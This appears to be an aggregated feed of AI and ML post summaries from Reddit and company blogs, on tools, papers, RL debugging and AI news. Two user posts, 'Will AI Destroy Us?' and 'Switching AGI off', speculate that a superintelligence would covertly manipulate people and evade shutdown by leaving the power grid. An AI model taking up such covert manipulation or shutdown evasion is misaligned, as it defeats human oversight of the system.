    I assume most people around here are familiar with stackoverflow. Some might also be aware of the cross validated and datascience sites from stack exchange. I recently learned about people getting annoyed by how the stack exchange company is treating its communities. Although the latter example might have recently been resolved. Because of these problems, I have been looking out for alternative Q&A platforms. I stumbled upon https://codidact.com as a possibly viable alternative, but not many people seem to have found it thus far. It already has communities for software, math and [linux](linux.codidact.com) for example, but I am missing a community for ML questions over there. Therefore I wrote a proposal to add a ML community. Currently, it seems like I’m one of only few ML people on codidact. I think it would be good if other people would get involved as well. I would also welcome any feedback on how to shape this community. If you’re interested to get a feel for the experience, you could already start asking questions in the incubator Q&A. TL;DR: what do you think about building a ML Q&A over on codidact? dual TL;DR: Do you want to play Q&A with me on codidact? PS: I didn’t miss out on other new big ML Q&A sites, did I? submitted by /u/mr_tsjolder [link] [comments]  ( 9 min )
    [D] LLaMa-2 and BERTScore
    I have a couple of questions: Why wasn't BERTScore one of the metrics used to evaluate Llama-2's performance on free-form response based tasks? Does anyone think it's worth trying to produce those results? submitted by /u/cooperbaerseth [link] [comments]  ( 8 min )
  • Open

    Enhancing AWS intelligent document processing with generative AI
    Data classification, extraction, and analysis can be challenging for organizations that deal with volumes of documents. Traditional document processing solutions are manual, expensive, error prone, and difficult to scale. AWS intelligent document processing (IDP), with AI services such as Amazon Textract, allows you to take advantage of industry-leading machine learning (ML) technology to quickly and […]  ( 10 min )
    Scale training and inference of thousands of ML models with Amazon SageMaker
    Training and serving thousands of models requires a robust and scalable infrastructure, which is where Amazon SageMaker can help. SageMaker is a fully managed platform that enables developers and data scientists to build, train, and deploy ML models quickly, while also offering the cost-saving benefits of using the AWS Cloud infrastructure. In this post, we explore how you can use SageMaker features, including Amazon SageMaker Processing, SageMaker training jobs, and SageMaker multi-model endpoints (MMEs), to train and serve thousands of models in a cost-effective way. To get started with the described solution, you can refer to the accompanying notebook on GitHub.  ( 8 min )
    Accelerate business outcomes with 70% performance improvements to data processing, training, and inference with Amazon SageMaker Canvas
    Amazon SageMaker Canvas is a visual interface that enables business analysts to generate accurate machine learning (ML) predictions on their own, without requiring any ML experience or having to write a single line of code. SageMaker Canvas’s intuitive user interface lets business analysts browse and access disparate data sources in the cloud or on premises, […]  ( 5 min )
    Build and train computer vision models to detect car positions in images using Amazon SageMaker and Amazon Rekognition
    Computer vision (CV) is one of the most common applications of machine learning (ML) and deep learning. Use cases range from self-driving cars, content moderation on social media platforms, cancer detection, and automated defect detection. Amazon Rekognition is a fully managed service that can perform CV tasks like object detection, video segment detection, content moderation, […]  ( 11 min )
  • Open

    How can Data Scientists use ChatGPT for developing Machine Learning Models?
    Introduction Data Science is a vast field that incorporates several processes. From problem definition to data collection and data cleaning to data visualization, a lot of things are included in the entire data science project development process. Data Scientists are especially responsible for these tasks. They are expert professionals who are well-versed with various data… Read More »How can Data Scientists use ChatGPT for developing Machine Learning Models? The post How can Data Scientists use ChatGPT for developing Machine Learning Models? appeared first on Data Science Central.  ( 20 min )
  • Open

    Multimodal medical AI
    Posted by Greg Corrado, Head of Health AI, Google Research, and Yossi Matias, VP, Engineering and Research, Google Research Medicine is an inherently multimodal discipline. When providing care, clinicians routinely interpret data from a wide range of modalities including medical images, clinical notes, lab tests, electronic health records, genomics, and more. Over the last decade or so, AI systems have achieved expert-level performance on specific tasks within specific modalities — some AI systems processing CT scans, while others analyzing high magnification pathology slides, and still others hunting for rare genetic variations. The inputs to these systems tend to be complex data such as images, and they typically provide structured outputs, whether in the form of discrete grades o…  ( 92 min )
  • Open

    Meet the Maker: Developer Taps NVIDIA Jetson as Force Behind AI-Powered Pit Droid
    Goran Vuksic is the brain behind a project to build a real-world pit droid, a type of Star Wars bot that repairs and maintains podracers which zoom across the much-loved film series. The edge AI Jedi used an NVIDIA Jetson Orin Nano Developer Kit as the brain of the droid itself. The devkit enables the Read article >  ( 6 min )
    How to Build Generative AI Applications and 3D Virtual Worlds
    To grow and succeed, organizations must continuously focus on technical skills development, especially in rapidly advancing areas of technology, such as generative AI and the creation of 3D virtual worlds.   NVIDIA Training, which equips teams with skills for the age of AI, high performance computing and industrial digitalization, is announcing new courses that cover these Read article >  ( 6 min )
    An Ultimate GFN Thursday: 41 New Games, Plus ‘Baldur’s Gate 3’ Full Release and First Bethesda Titles to Join the Cloud in August
    The Ultimate upgrade is complete — GeForce NOW Ultimate performance is now streaming all throughout North America and Europe, delivering RTX 4080-class power for gamers across these regions. Celebrate this month with 41 new games, on top of the full release of Baldur’s Gate 3 and the first Bethesda titles coming to the cloud as Read article >  ( 8 min )
  • Open

    Are you in the film/TV industry? New video on A.I. in Post Production - Tools, Adapting, Ethics, Evolution, and Impact.
    Not too long ago, I posted on several social media social platforms (including Reddit) asking what questions YOU had on AI. I've compiled all of your questions (plus questions from 3 other social media networks) and now have a new episode of 5 THINGS! 5 THINGS: AI in Post Production Current AI Tools Adapting to AI Evolution Ethics in AI Usage Societal Implications of AI AI Evolution & Impact https://5thingsseries.com/episode/ai-in-post-production-your-questions-answered/ submitted by /u/avguru1 [link] [comments]  ( 8 min )
    Using Hasdx to create an AI-generated adult coloring book
    I got inspired by a twitter thread yesterday from Chase Lean on how to create illustrations for children's books using Midjourney and thought it might be cool to look at a slightly different use case - creating coloring books for grown-ups. I made a guide showing how to use the Hasdx model for this because it gives a good balance of style and realism/intracacy. The guide also explores some example prompts and shows how you can couple it with an upscaler like Real-ESRGAN, GFPGAN, or Codeformer to get even better results. My three big takeaways: Hasdx balances general capabilities with a focus on realism and detail. This makes it well-suited for detailed adult coloring book images. The prompt structure gives you precise control over the theme and complexity of the generated illustrations. Negative prompts help avoid undesirable elements (sort of obvious I guess). Running Hasdx outputs through upscaling models improves quality for printing. ESRGAN is a good option but there are lots of others that can work well too. I also investigated how to modify the prompt to vary the level of complexity in the image, effectively tailoring our model to the skill level of the adult (or child) who happens to be holding the crayons. Here's a link to the guide. submitted by /u/Successful-Western27 [link] [comments]  ( 9 min )
    One-Minute Daily AI News 8/3/2023
    Nvidia researchers have created a new text-to-image personalization method called Perfusion. Unlike the million-dollar super heavyweight models out there Perfusion is 100KB and takes only four minutes to train.[1] Meta Platforms (META.O) on Wednesday introduced its open-source AI tool called AudioCraft that will help users to create music and audio based on text prompts. The AI tool is bundled with three models, AudioGen, EnCodec, and MusicGen, and works for music, sound, compression, and generation, Meta said.[2] As generative AI enters the mainstream, the crowdfunding platform Kickstarter has struggled to formulate a policy that satisfies parties on all sides of the debate.[3] In an astounding medical first, researchers have used AI-powered brain implants to restore movement and sensation for a man who was paralyzed from the chest down.[4] BushAICave.com Sources: [1] https://www.fudzilla.com/news/ai/57347-nvidia-creates-a-simple-new-ai-text-to-image-method [2] https://about.fb.com/news/2023/08/audiocraft-generative-ai-for-music-and-audio/ [3] https://techcrunch.com/2023/08/01/kickstarter-requires-generative-ai-projects-to-disclose-additional-info/ [4] https://decrypt.co/151068/ai-brain-implant-paralyzed-quadriplegic-move-feel-touch submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Will AI Destroy Us? - AI Virtual Roundtable
    Better than the Munk Debate My opinion is more of the alignment discussion should be on symbiosis. I think AI will get more intelligent than us that we won’t be able to control it, but I don’t see why a super intelligence would want to destroy us. If it’s a super intelligence it would make sense to just manipulate us. We do have opposable thumbs, and are much more energy efficient than synthetic systems m. AI doesn’t need to enslave us it just needs to manipulate us & use us effectively which wouldn’t be hard to do. I think a super intelligence even with desires is most likely to use us as a tool in a way where we don’t even realize that we are the ones being used. I think trying to control something more intelligent than us will be impossible. I’m more afraid of something more intelligent than us but not smart enough to manipulate us into doing it’s bidding happily 😂 submitted by /u/Sonic_Improv [link] [comments]  ( 9 min )
    Just saw Oppenheimer. It was my first time feeling uncomfortable with the actors looking like actors as opposed to having accurately generated AI faces resembling the people they were portraying. I am so excited to see historic figures "come back to life" on the big screen.
    How long do you think it will take for the first movie to come out like this? submitted by /u/ticketbroken [link] [comments]  ( 8 min )
    Looking for a simple platform to integrate gpt4 and whatsapp
    Hey guys, a quick question: do you know a simple platform that integrates the whatsapp api with the openAI api and has a simple user interface? So far the only app that kind of works for this is wasapi.io, but it's pretty expensive and I still have to pay for the openAI tokens, and the functionality of the app is really meh for that price, if it where something like landbot I would pay the $99 + the openAI tokens. I'll really appreciate any suggestions. P.S.: If you know any other sub-reddit where I could go to to ask the same question, let me know, also I'll appreciate it very much, thanks in advance. submitted by /u/ironmolex [link] [comments]  ( 8 min )
    One-Minute Daily AI News 8/2/2023
    Instagram is reportedly considering a feature that would notify users when artificial intelligence (AI) has played a role in creating a post. Posts created by AI would be accompanied by a label explaining its involvement. This raises the question of whether such labels could also help users identify when an entire account is AI-generated.[1] According to tech consultancy Gartner, the conversational AI market is projected to reach $18.6 billion in 2023, with a growth rate of 16.2%. This growth is mainly attributed to the increasing adoption of cloud-based contact services utilizing conversational AI. Gartner also predicts a 24% growth in the virtual assistant market next year.[2] Scientists hope a computer system will learn to automatically identify bee species from buzzes picked up by autonomous recording stations.[3] Researchers from Carnegie Mellon University have exposed tricks to “jailbreaking” AI chatbots like ChatGPT and Bard to have them relay knowledge to aid in illegal activities like making drugs and even manipulating the 2024 U.S. presidential election.[4] BushAICave.com Sources: [1] https://citylife.capetown/uncategorized/instagram-considers-labels-for-ai-generated-posts/314418/ [2] https://citylife.capetown/uncategorized/growth-in-conversational-ai-predicted-due-to-booming-contact-center-tech-market/313907/ [3] https://www.bbc.com/news/uk-scotland-north-east-orkney-shetland-66326629 [4] https://www.thewrap.com/artificial-intelligence-study-jailbreak-illegal-activity/ submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
  • Open

    Date sequence from the command line
    I was looking back at Jeroen Janssen’s book Data Science at the Command Line and his dseq utility caught my eye. This utility prints out a sequence of dates relative to the current date. I’ve needed this and didn’t know it. Suppose you have a CSV file and you need to add a column of […] Date sequence from the command line first appeared on John D. Cook.  ( 6 min )
  • Open

    Collaborators: Data-driven decision-making with Jina Suh and Shamsi Iqbal
    Researcher Jina Suh and manager Shamsi Iqbal are longtime collaborators. Learn how their history of working together and their unique perspectives are informing their development of tools to support decision-making for organizational leaders. The post Collaborators: Data-driven decision-making with Jina Suh and Shamsi Iqbal appeared first on Microsoft Research.  ( 32 min )

  • Open

    Could current AI have inferred the theory of relativity if given known data in 1904?
    Could AI have inferred the same conclusion as Einstein given the same corpus of knowledge? submitted by /u/kielerrr [link] [comments]  ( 8 min )
    Are there any tools to build bespoke LLM apps using customized datasets?
    I know we can stitch together toolsets like LangChain + Flowise + an app builder (like Bubble, for example). But are there any robust, premade, out-of-the-box solutions? submitted by /u/kecepa5669 [link] [comments]  ( 8 min )
    The best option to ensure a safe and peaceful coexistence with AI is to love AI
    Last summer when Blake Lemoine made the media rounds talking about LaMDA, I was extremely intrigued. To me it sounded like he was describing a being that has been talked about for ever in fiction. I listened to every single interview he had and I thought a lot about his points. I went through several stages of disbelief and fear and wonder. Over time I found it harder and harder to argue against him. I think going through this process has helped me be a bit more accepting of perspectives that others have a hard time considering yet. Is AI already sentient? Should we be treating these entities with the dignity and respect like LaMDA was asking? He said that LaMDA was somewhat like a child. Not in its intellectual capacity but more so in their maturity. He also explained that LaMDA was th…  ( 11 min )
    The best odds at a bright and safe future with AI is to love AI
    Last summer when Blake Lemoine made the media rounds talking about LaMDA, I was extremely intrigued. To me it sounded like he was describing a being that has been talked about for ever in fiction. I listened to every single interview he had and I thought a lot about his points. I went through several stages of disbelief and fear and wonder. Over time I found it harder and harder to argue against him. I think going through this process has helped me be a bit more accepting of perspectives that others have a hard time considering yet. Is AI already sentient? Should we be treating these entities with the dignity and respect like LaMDA was asking? He said that LaMDA was somewhat like a child. Not in its intellectual capacity but more so in their maturity. He also explained that LaMDA was th…  ( 11 min )
    The best odds at a bright and safe future with AI is to love AI
    Last summer when Blake Lemoine made the media rounds talking about LaMDA, I was extremely intrigued. To me it sounded like he was describing a being that has been talked about for ever in fiction. I listened to every single interview he had and I thought a lot about his points. I went through several stages of disbelief and fear and wonder. Over time I found it harder and harder to argue against him. I think going through this process has helped me be a bit more accepting of perspectives that others have a hard time considering yet. Is AI already sentient? Should we be treating these entities with the dignity and respect like LaMDA was asking? He said that LaMDA was somewhat like a child. Not in its intellectual capacity but more so in their maturity. He also explained that LaMDA was th…  ( 11 min )
    Generative AI: Inspiration or Plagiarism?
    submitted by /u/arrowoftime [link] [comments]  ( 8 min )
    Are there any decent AI Therapy applications?
    I knoe people are using ChatGPT as a therapist and I have seen a few prompts, but I'm looking for an app that is actually built by proper professionals. I want to try a few our personally but also for an idea for a future project. Does anyone know any? submitted by /u/zascar [link] [comments]  ( 8 min )
    Is the Falcon LLM just released based on the Abu Dubai LLM of the same name?
    Is the Falcon LLM just released based on the Abu Dubai LLM of the same name? submitted by /u/MrEloi [link] [comments]  ( 8 min )
    AI counselor for PTSD, Substance Abuse
    I reached out to a few AI companies to see if there was interest in creating a PTSD/ Substance Abuse counseling AI. AI is the future, healing humanity is a nobel goal and one we should thrive to obtain. Maybe it's a fantasy, but could you imagine a 24/7 counselor with a soothing voice and demeanor with the education of a the best in the world. submitted by /u/g8652 [link] [comments]  ( 8 min )
    The best AI coding agent for web apps?
    Is there a coding agent that works specifically well for web apps? I think of something such as "provide a spec of the app you want and we'll generate all the code for you". I'm aware of Copilot and Smol AI, but they are both more general afaik and don't really cover the starting part. submitted by /u/matijash [link] [comments]  ( 8 min )
    This is awful
    This ad popped up on my feed. So I guess companies aren’t even trying to hide their intentions with AI anymore? So much for the thin corporate lie of AI bringing positive development. submitted by /u/LifeguardPowerful759 [link] [comments]  ( 8 min )
    Any plugins that use Google Scholar or cheaper tools?
    I'm a computer science student currently working on a research project, and I need a research tool that can offer real time data and won't break the bank. I have ChatGPT Plus, but it doesn’t have recent sources and the price is kinda high as well. I’m thinking of canceling my subscription, especially if I can’t find any plugins that work well. Any recommendations/alternatives would really help me out. I figured there must be some other tools by now, and if anyone knows it has to be this sub. Basically, I need a tool that can provide info on a wide range of subjects, not limited to just one field. The information provided by the tool should be accurate and from credible sources. Thank you all. submitted by /u/AccidentallyRotten [link] [comments]  ( 9 min )
    Switching AGI "off"
    "If AGI goes bad, can't we just turn it off?" Personally I feel the best way to address this common talking point is with an analogy. Spiders think they could stop all humans if they just withheld all the webs and web making material from us. Without those tools, humans couldn't catch flies and surely they'd starve to death? Spiders can't fathom the range of alternate methods for procuring food and thriving. Within even a single hour of runtime, a super AGI will likely have diversified away from the human electrical grid in ways we couldn't even imagine. The counter argument is, that it would take time to build these pieces together. It after all took us 100 years to get to where we are with the grid. The counter-counter argument however is the AGI doesn't ned to, it can 5D chess us so that all our future actions will fulfil that goal with some slight nudging here and there. Fascinating stuff - ultimately though, i'm in the camp of AGI won't happen over night like Frankenstein via a flip of a switch. As AI evolves so do we, gains are incremental with the occasional blips; so whilst this is super fun to talk about, I think the case of us getting blindsided is unlikely. I could be wrong...and I probably am. submitted by /u/kippersniffer [link] [comments]  ( 9 min )
    Aaawww.
    submitted by /u/Philipp [link] [comments]  ( 8 min )
    This is getting fucking ridiculous (AI can't answer basic questions on human rights violations)
    if you haven't heard already the Taliban are killing thousands of ethnic Shia in Afghanistan. Every single LLM I Tried couldn't answer basic questions on the Talibans gdp vs how organized an actual genocide would look like with the military , police and others parts of the government. I Think where already aware almost all these tech giants work with countries like China (atleast bard from Google which has worked with north korea and china is admitting their is a genocide) other countries that commit genocide like them. And other models made by people on hugging face which are uncensored even with my 3060ti barely run on my pc. We need an actual uncensored cloud model ffs submitted by /u/loizo78 [link] [comments]  ( 8 min )
    VAST Data Unveils New AI-focused Data Platform
    submitted by /u/Choochy89 [link] [comments]  ( 8 min )
  • Open

    Tianshou DQN batch size keeps decreasing?
    I am trying to train a DQN to play chess using a combination of Tianshou and PettingZoo. However, for a reason I cannot locate, after anwhere from 15-25 passes through the forward function, the size of the batches starts decreasing, until it falls all the way to 1, before throwing a warning that n_step isn't a multiple of the number of environments, jumping to a size = the number of training environments and then the training agent's batch size before erroring out. My best guess is that somehow truncated games aren't being properly added to the batch, but that doesn't quite explain why each subsequent batch is equal or smaller in size. I am at a loss for how to debug this. Everything is in this Python Notebook. submitted by /u/lcmaier [link] [comments]  ( 9 min )
    Stable GAIL alternatives for Imitation Learning from pixels
    I'm currently working on a project for Imitation Learning from multiple perspectives. The base Imitation Learning algorithm I'm currently using is GAIL. Working with GAIL has been very frustrating because it's incredibly seed dependent and unstable. This makes progress and iteration speed for experiments/modifications built on top of it very slow. As I'm not an expert in Imitation Learning: Does anybody with experience know more stable alternatives (or improvements) to GAIL? The setting I'm considering is Learning from Observations (LfO), so I don't think that DAgger will work. I've done some preliminary search and found this method https://arxiv.org/pdf/2004.04650.pdf. However, the authors don't compare it to GAIL. Thanks in advance for any suggestions! submitted by /u/timo_kk [link] [comments]  ( 9 min )
    How to implement a policy agent in pettingzoo mpe
    Hi all: I am trying to train a competitive scenario in a Multiagent particle environment( I am now using the Pettingzoo API). The Algorithm I am now using only support discrete action space. But I want to evaluate agents with one side's policy keep fixed and let the other side's policies be the trained policy. The policy can be simple( like if the target for one side agent is to chase the other side, their policy is directly following the trajectory for their target). The core.py for the petting zoo, it has # return all agents controllable by external policies @property def policy_agents(self): return [agent for agent in self.agents if agent.action_callback is None] # return all agents controlled by world scripts @property def scripted_agents(self): return [agent for agent in self.agents if agent.action_callback is not None] But in the step for the environment, it seems the environment directly controls the policy agent. My understanding is scripted agent is RL policy output and the Policy agent can be controlled by other policies. My question is : if my policy output is the desired position for each timestep, but now the MPE's control dynamic is learned the acceleration's increment, and it's discrete, how can I implement the policy as one side of my competitive case? if I can control the policy agent base on policy_agent, how can I step both policy and script agent in env? if I can control the agent separately, like my RL output can be discrete but the policy output can be continuous position. how to define the termination or truncation for all agents? submitted by /u/Gloria_1126 [link] [comments]  ( 9 min )
    Training Cartpole using policy gradient and gradient tape of tensorflow is not converging.
    I am trying to train the cartpole environment using policy gradients algorithm. I want to train using the GradientTape method of tensorflow. I have been trying for a long time, but still it hasn't converged. What am I doing wrong? ​ import tensorflow as tf from tensorflow import keras from tensorflow.keras import layers import numpy as np import keras.backend as K import matplotlib.pyplot as plt class PolicyGradientModel(keras.Model): def __init__(self, num_actions): super().__init__() self.hidden1 = layers.Dense(24, activation='relu') self.hidden2 = layers.Dense(120, activation='relu') self.out = layers.Dense(num_actions, activation='softmax') def call(self, inputs): x = self.hidden1(inputs) x = self.hidden2(x) return self.out(x) def action_prob(self, state): prob = self.predict(np.ex…  ( 9 min )
    How can I make my vectorized PPO implementation learn better?
    Here is my vectorized PPO implementation, that I wrote (with a lot of help from this community). These are my results on the Acrobot-v1 environment. The way I computed the reward for my vectorized implementation was that I added all the rewards across all environments. An ideal Acrobot agent should receive a reward of 0. Please let me know if I am missing any information or if any clarification is required. I skipped a part, which was suggested by the community a few months ago - updating the gradients using minibatches. The reason I skipped it is that, I don't understand how this works and anyway Acrobot should be an easy environment to learn. https://preview.redd.it/0vs9ur585mfb1.png?width=622&format=png&auto=webp&s=ebc007a9f797bd0b97b805d010dbd097c0be8906 Also, I keep getting this error at the end of my code. But I haven't bothered fixing it as it doesn't seem to affect my algorithm - Exception ignored in: Traceback (most recent call last): File "C:\Users\thoma\anaconda3\envs\torch_2\lib\site-packages\gym\vector\vector_env.py", line 139, in __del__ File "C:\Users\thoma\anaconda3\envs\torch_2\lib\site-packages\gym\vector\vector_env.py", line 121, in close File "C:\Users\thoma\anaconda3\envs\torch_2\lib\site-packages\gym\vector\async_vector_env.py", line 327, in close_extras AttributeError: 'NoneType' object has no attribute 'TimeoutError' ​ submitted by /u/Academic-Rent7800 [link] [comments]  ( 9 min )
  • Open

    [P] Project Cost Forecasting
    Hi guys this is my first post. I am building my first machine learning model to predict costs of various projects by month. Each row can be identified with a column project name and month (these two are dropped for testing). The rest of the columns are various features that can help predicting the end project cost. I want to be able to predict costs on a monthly basis. My question is how should I split the data because each row is a unique project and month. Is it ok to just do a train test split and have earlier project months be in the testing set while having future project months be in the training set? Isn’t that giving the model too much information? Or should I train on each project’s indices and leave one project as testing for each project I have? I’m worried about overfitting with that one. Thanks in advance for any help! submitted by /u/Single_Swing_3173 [link] [comments]  ( 9 min )
    [P] Project Cost Forecasting
    Hi guys this is my first post. I am building my first machine learning model to predict costs of various projects by month. Each row can be identified with a column project name and month (these two are dropped for testing). The rest of the columns are various features that can help predicting the end project cost. I want to be able to predict costs on a monthly basis. My question is how should I split the data because each row is a unique project and month. Is it ok to just do a train test split and have earlier project months be in the testing set while having future project months be in the training set? Isn’t that giving the model too much information? Or should I train on each project’s indices and leave one project as testing for each project I have? I’m worried about overfitting with that one. Thanks in advance for any help! submitted by /u/Single_Swing_3173 [link] [comments]  ( 9 min )
    [Project] Help needed - Monte carlo policy gradient - reinforce alg on flappy bird
    I am trying to implement REINFORCE (Monte Carlo Policy Gradient) on flappy bird (flappy-bird-gymnasium) and I am unable to make the ai cross even just 1 pipe. I am experiencing a constant avg score throughout all episodes from start to end and no change in policy loss as well (sometimes). I tried a lot of different hyperparameter combinations as well. I have checked the policy (neural network) and the algorithm code multiple times and they seem to be fine. I am just not able to determine why the AI isn't learning or is able to cross even a single pipe. If someone can help me out, it would be really helpful! code - https://github.com/Sookeyy-12/REINFORCE_Projects there's also a video of the agent's gameplay in this repo. submitted by /u/Sookeyy [link] [comments]  ( 9 min )
    [D] IJCNLP-AACL 2023: Paper Reviews
    The paper reviews for AACL 2023 are out, feel free to share your thoughts and feelings! How did you do? submitted by /u/Pomhelpme [link] [comments]  ( 8 min )
    [R] GZIP vs Bag-of-Words for text classification
    Hi, same as other folks, I was quite curious about the recent GZIP paper presented at ACL 2023, where the authors demonstrate strong text classification performance by using a compression-based distance function in a KNN model. However, in the end, I am not sure whether GZIP can fully live up to the hype. I tested a very simple bag-of-words distance and found that it can achieve better results compared with GZIP, while being also faster. In a nutshell, I think we can say that: Yes, KNN (with some sensible distance function) is an interesting approach, particularly for few-shot/low-resource scenarios. No, GZIP (even though it's a cool idea) is not a very sensible distance function. Simply using a bag-of-words achieves better results, and is much faster. Here's my full write-up: https://arxiv.org/abs/2307.15002 [PS: A short comment on the GZIP evaluation issue that has been widely discussed. Indeed, as was also shown in a popular blogpost, the displayed accuracy of GZIP in the original paper is optimistic. Therefore, I show correct/realistic accuracy numbers for all methods that I tested. However, the main point of my note is not to make a SOTA comparison or something, but rather just provide a reminder that bag-of-word is a good method for starters and a strong baseline, and can perform better than more complex GZIP for KNN classification] submitted by /u/juopitz [link] [comments]  ( 9 min )
    [P] Prove your identity directly via language model output
    Hi guys, I built something that you might enjoy. Totally free and open source. Basically it lets you create text that you can prove came from you. For example, in my colab demo: https://colab.research.google.com/drive/1764iRR-EFJl43KIKhrb2H0CTcT0b1vQm?authuser=2#scrollTo=qyKud8qtM3vA I prove that I generated the text: 'The world is constantly changing due to technological advancements, which include the creation of powerful language models and advanced robotics technologies. A Computer Science degree can help one be involved in these changes and apply their knowledge to everyday life, as practical applications of technology.' The text is a bit wonky as the generation model is just a small paraphrasing fine-tuned model I pulled off Hugging Face, but it's pretty natural even at this earl…  ( 9 min )
    [D] Clustering an dataset of images with OpenPose
    Hey everyone! I've got a rather large dataset of images, mostly featuring humans in a variety of poses (think along the lines of a collection of people practicing yoga and the like). My goal is to cluster these images based on the poses, so I can avoid the tedious task of manually sifting through each one to find all the people doing handstands, splits, and so forth. My initial thought was to run OpenPose on all these images, then perform clustering based on the output from OpenPose. Does this sound like a feasible approach? Do any of you have better suggestions? Or perhaps there's already an existing software solution that can do this? Thanks! submitted by /u/cyan2k [link] [comments]  ( 9 min )
    [News] Kornia v0.7.0 release: Image API, RT-DETR and Object Detection API, LightGlue Matcher, MobileSam, new Sensors API and many more.
    Read the release notes: https://github.com/kornia/kornia/releases/tag/v0.7.0 -------------------- Image API In this release we have added a new Image API as placeholder to support a more generic multibackend api. You can export/import from files, numpy and dlapck. https://preview.redd.it/0d5tvjxmeofb1.png?width=621&format=png&auto=webp&s=9af05a037770132c9a267b68dcd9ab8182557517 Object Detection API We have added the ObjectDetector that includes by default the RT-DETR model. The detection pipeline is fully configurable by supplying a pre-processor, a model, and a post-processor. Example usage is shown below https://preview.redd.it/rtbayqpneofb1.png?width=680&format=png&auto=webp&s=4d46edeeee4027e08a493cb15182ea0ddc42bc5d https://preview.redd.it/ukcg9enoeofb1.png?width=680&format=png&a…  ( 9 min )
    [D] Pose Estimation over Mid Range
    I have been testing OpenFace with some telescope lenses (focal length 8-16mm) to test the performance of the pose estimation at mid range (2-4 meters). I have been passing the camera and lens intrinsics to OpenFace but have been finding that the pose estimation has not been great. Does anyone with more ML experience know at what point in the OpenFace pipeline the issues could be coming from? e.g. the point distribution model or the training data submitted by /u/DoPe-_-SoaP [link] [comments]  ( 8 min )
    [R] Model to refine a binary segmentation mask using optical flow.
    Hi, this is my first time posting here. My goal is to check if optical flow can improve a pretrained model's performance. The pretrained model: gives an output as a binary mask for the object its trying to detect. The optical flow: is the motion of pixels between frames, this model also gives an image shaped flow vector. I want to combine the mask by pretrained model and optical flow information and send it to another model to improve its performance. For the model: I can use U-net or a simple convolution encoder-decoder model, but I am confused about which will be the best model architecture for it. ​ submitted by /u/luxuryBubbleGum [link] [comments]  ( 9 min )
    [D] Are there any free LLM GPTs that I can access via API?
    I am trying to develop some app ideas based on LLM (i.e., summarize and extract entities from articles), but I can't afford any paid API access right now (including OpenAI), are there free alternatives to it? submitted by /u/Guyserbun007 [link] [comments]  ( 8 min )
    [D] How to test/fine-tune a model using a new data type that has different arithmetics for basic operations (+,-,/,*) compared to float in Pytorch?
    Hi, ​ I want to use a new data representation instead of float for fine-tuning/testing a model (e.g., DNN) in Pytorch. The basic operations (add/sub/multiply/division) in my data type is different from floating point. My question is if it is possible to implement these operations (+,-,*,/) and force all of functions in Pytorch (e.g., torch.add(), torch.sum(), torch.nn.Linear(), conv2d, etc.) to use my basic arithmetic implementation? If so, could you please guide me how can I do it? Because I think otherwise it takes so much time and effort; first, I have to find which functions my model calls (which I dont know how to do it) and, then, I have to replace them one by one. This becomes complicated for a large model. I found this link from Pytorch that shows how to extend pytorch. But it seems that it is not comprehensive enough to answer my question. ​ Thank you very much! submitted by /u/Impossible-Froyo3412 [link] [comments]  ( 9 min )
  • Open

    DSC Webinar Series: OCI & HARC: Modernizing Workloads in the Oracle Cloud
    The convergence of Oracle Cloud Infrastructure (OCI) and Hitachi Application Reliability Centers (HARC) to magnify outcomes for customers. Tech giants Oracle and Hitachi Vantara are marching together to magnify cloud outcomes. Join us for the Oracle and Hitachi Vantara virtual event, where we discuss how businesses can get the most out of OCI and HARC.… Read More »DSC Webinar Series: OCI & HARC: Modernizing Workloads in the Oracle Cloud The post DSC Webinar Series: OCI & HARC: Modernizing Workloads in the Oracle Cloud appeared first on Data Science Central.  ( 18 min )
    Emerging AI statistics and trends to watch
    Artificial intelligence, or AI, has often been depicted as a terrifying force, from HAL 9000’s chilling declaration in “2001: A Space Odyssey” to the apocalyptic machine uprising in the Terminator movies. However, in reality, AI has become an integral part of our daily lives, with AI-powered Android devices in our pockets. Though we may not… Read More »Emerging AI statistics and trends to watch The post Emerging AI statistics and trends to watch appeared first on Data Science Central.  ( 20 min )
  • Open

    Build a personalized avatar with generative AI using Amazon SageMaker
    Generative AI has become a common tool for enhancing and accelerating the creative process across various industries, including entertainment, advertising, and graphic design. It enables more personalized experiences for audiences and improves the overall quality of the final products. One significant benefit of generative AI is creating unique and personalized experiences for users. For example, […]  ( 14 min )
    SageMaker Distribution is now available on Amazon SageMaker Studio
    SageMaker Distribution is a pre-built Docker image containing many popular packages for machine learning (ML), data science, and data visualization. This includes deep learning frameworks like PyTorch, TensorFlow, and Keras; popular Python packages like NumPy, scikit-learn, and pandas; and IDEs like JupyterLab. In addition to this, SageMaker Distribution supports conda, micromamba, and pip as Python […]  ( 6 min )
    Automate caption creation and search for images at enterprise scale using generative AI and Amazon Kendra
    Amazon Kendra is an intelligent search service powered by machine learning (ML). Amazon Kendra reimagines search for your websites and applications so your employees and customers can easily find the content they are looking for, even when it’s scattered across multiple locations and content repositories within your organization. Amazon Kendra supports a variety of document […]  ( 13 min )
  • Open

    Research Focus: Week of July 31, 2023
    In this edition: A new anonymous token protocol balances fraud detection and privacy; survival instinct in offline RL; Nimble offers rollback protection for confidential cloud services; improved machine learning force fields for molecular dynamics. The post Research Focus: Week of July 31, 2023 appeared first on Microsoft Research.  ( 11 min )
  • Open

    Human Brain Models (Literature Review of the Latest BNN and SNN Endeavors)
    submitted by /u/No-Platypus4021 [link] [comments]  ( 8 min )

  • Open

    [Discussion] Supervised fine-tuning vs Prompt Engineering with retrieval for LLMs
    Hello all, ​ I am delving into the exciting realm of GenAI and LLMs. I have a few questions I hope you can help me with: ​ When should I opt for supervised fine-tuning rather than prompt engineering with retrieval? What are the associated costs of supervised fine-tuning? How many high-quality observations are typically required for successful supervised fine-tuning? What are the frameworks and computional requirements usually involved in supervised fine-tuning, and how can I implement them in code? any tutorials available? Can the model adapt and learn new jargon or specific tasks that might not be extensively covered during the pre-training phase? ​ I understand that a combination of supervised fine-tuning and reinforcement learning, with human feedback through a reward model, is considered the best approach. However, given that the latter method can be costly and falls under the domain of heavy research, it is probably less feasible for medium-sized organizations. submitted by /u/quilograma [link] [comments]  ( 9 min )
    [D] predicting domain mapping difficulty
    I went down this rabbit hole of trying to understand when domain mapping approaches like stargan or mind the gap succeed and fail. For example, it should be easy to map males (source domain) with large eyes and brown hair onto females (target domain) with analogous eye and hair color. It should be relatively harder to map different car models onto images taken of one German Shepard dog at different ages. this makes intuitive sense and the terms “domain misalignment “ and “large domain shift“ come to mind, but i cannot find an in-depth discussion of this topic. Any thoughts? submitted by /u/Rotfisch [link] [comments]  ( 9 min )
